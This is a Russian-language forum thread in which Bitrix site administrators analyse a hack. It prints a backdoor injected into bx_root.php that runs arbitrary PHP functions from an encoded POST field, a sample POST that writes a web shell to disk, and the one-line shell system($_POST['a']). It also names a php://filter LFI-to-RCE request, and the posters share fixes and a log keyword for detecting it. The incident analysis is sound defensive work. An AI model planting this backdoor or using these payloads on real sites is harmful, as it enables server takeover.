Разбор того как работает взлом через POST к главной странице.
Используя ДРУГУЮ уязвимость поражают \bitrix\modules\main\bx_root.php дописывая в его конец это:
Код
<?
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?>
Видимо по архитектуре Битрикса файл bx_root.php будет задействован при любом запросе. По крайне мере при запросе в корень точно. Далее, атакующий в любой удобный момент времени посылает POST запрос примерно следующего содержимого:
0=system&1=echo PD89N.....DA5NzI1lIl0pO319Pz4=|base64 -d| tee 5b186f810c33.php
parse_str заполнит 3 элемента массива $bx_stat, а потом будет вызвана функция с 2-мя аргументами $bx_stat[0]( $bx_stat[1], $bx_stat[2] ) и чаще всего это будет file_put_contents( virus_name, virus_body )
Первый запрос GET к корню, потом экплойт через POST. Спустя несколько секунд проверка шелла GET /5b186f810c33.php Как лечить? Удалить в bx_root.php добавленный код if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
Но это все следствия! Как и множество других "страшнозакодированных" скриптов и .htaccess'ов которые здесь постили. Причина, в моем случае точно, в другом. Вот с чего все начиналось:
Код
POST /products/index.php?ID=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.....
У Битрикса где-то внутри стоит что-то вроде include($_POST). Это и есть уязвимость LFI2RCE via PHP Filters! Весь этот запрос ( он у меня есть ) путем манипуляций кодировок превращается в следующий код:
Код
<?php system($_POST["a"]); ?>
соответственно будет произведен запуск любой команды из POST параметра 'a'. Ключевое слово для поиска в логах CSISO2022KR - это обозначение корейской кодировки, без нее ничего не работает. Почему так - сказано в статье
Как лечить? Пока поставить такую заглушку в /products/index.php if($_SERVER['REQUEST_METHOD']=='POST') die();
Или глобально ('php')
Искать где находиться уязвимый код include($_POST) буду дальше.
Все полные логи и коды запросов имеются, могу выслать желающим
Все полные логи и коды запросов имеются, могу выслать желающим
У меня в логах ничего похожего не видать, а результаты с htaccess'ами и рандомными файлами налицо. Версии файлов у меня от 2020 года. После накатывания бэкапа часа через два лезть всякое начинает. Но, может, плохо ищу. И CSISO2022KR тоже не вижу.
написал: Разбор того как работает взлом через POST к главной странице.
Первый запрос GET к корню, потом экплойт через POST. Спустя несколько секунд проверка шелла GET /5b186f810c33.php Как лечить? Удалить в bx_root.php добавленный код if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
Возможно будет полезно кому то, у меня история крайне похожа, сайт упал, модифицированный htaccess хтмл файлы, да еще и ограничить вход с 1 ip толком не получается, но у меня не с POSTом дело у меня это выглядит так
Возможно будет полезно кому то, у меня история крайне похожа, сайт упал, модифицированный htaccess хтмл файлы, да еще и ограничить вход с 1 ip толком не получается, но у меня не с POSTом дело у меня это выглядит так
Дык это нормальное содержимое bx_root.php, вот такой он в исходниках:
Тогда я уже не знаю куда смотреть, уже третий день валандаюсь с этой хренью, сегодня продлим лицензию и обновим платформу, но блин три дня. Сначала подняли сайт прошерстили антивирусом, сайт работает, но хтмл файлы все равно появляются, хотя и пустые, просто шарики за ролики уже вылетают. Если обновление платформы не поможет то уже не знаю что делать
vvv476, у Вас на исследуемом сайте стоят все актуальные обновления движка Битрикса?
запросы с CSISO2022KR возможно просто проверочные, так сказать скан по базе доменов на уязвимость если они есть в логах это ещё не значит, что они отработали и сайт уязвим ...
для проверки осталось только реализовать уязвимость и попробовать на своём сайте
сугубо по фактам - мне не попадалось ни одного зараженного сайта с установленными актуальными обновлениями, так что делайте выводы
